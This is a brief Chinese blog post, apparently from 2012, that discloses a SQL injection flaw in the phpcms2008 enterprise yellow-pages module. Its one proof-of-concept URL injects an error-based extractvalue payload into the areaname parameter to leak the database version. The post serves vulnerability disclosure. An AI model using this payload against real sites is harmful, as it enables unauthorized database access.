matrix 技术教程 2012-05-13 phpcms2008企业黄页模块SQL注射漏洞 phpcms 企业黄页模块由于参数未过滤存在SQL注射漏洞,允许攻击者执行SQL语句.0day是幌子,鸡肋是真的,由于影响比较小,不会造成什么危害,N久之前发现的鸡肋,发出来给博客滥竽充数啦. 漏洞证明: http://www.127.0.0.1.com/phpcms2008/phpcms/yp/product.php?catid=1&areaname=555%27%20and%20extractvalue%281,concat%280×09,%28version%28%29%29%29%29%20and%20%271%27=%271 黑侠网络,免费分享互联网!我的主页 黑侠网络 » phpcms2008企业黄页模块SQL注射漏洞
